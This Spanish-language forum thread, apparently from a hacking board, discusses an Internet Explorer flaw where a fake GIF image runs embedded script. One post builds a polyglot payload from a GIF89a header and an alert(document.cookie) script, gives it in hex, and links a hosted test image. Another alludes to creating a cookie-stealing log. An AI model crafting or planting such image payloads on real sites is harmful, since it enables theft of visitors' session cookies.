Antes de crear el LOG fijense si funciona un simple ALERT para probar si la vulnerabilidad realmente funciona.
Teniendo en cuenta que en realidad se trata de una omision de IE es posible que quienes visiten el post con el exploit tengan en su explorador el parche adecuado...
Al menos eso creo...
Yo aún no he visto que ese exploit funcione...
Teniendo en cuenta que en realidad se trata de una omision de IE es posible que quienes visiten el post con el exploit tengan en su explorador el parche adecuado...
Al menos eso creo...
Yo aún no he visto que ese exploit funcione...
podriamos probar poniendo la supuesta imagen en hexa, a ver si funciona (yo no tengo foro en q probar... )
por ejemplo:
la cabecera del gif:
Código:
47 49 46 38 39 61 01 00 01 00
Código:
<HTML><HEAD><SCRIPT>alert(document.cookie);</SCRIPT></HEAD></HTML>
Código:
47 49 46 38 39 61 01 00 01 00 3C 48 54 4D 4C 3E 3C 48 45 41 44 3E 3C 53 43
52 49 50 54 3E 61 6C 65 72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F 6B 69
65 29 3B 3C 2F 53 43 52 49 50 54 3E 3C 2F 48 45 41 44 3E 3C 2F 48 54 4D 4C
3E
en este caso probamos como cabecera del GIF
Código:
GIF89a_--.
para probar (unicamente con IE, con firefox no funciona)
http://planet.nana.co.il/mycoolpictures123/fake/lt2.jpg
PD:adapatacion de un texto de K-Gen
Salu2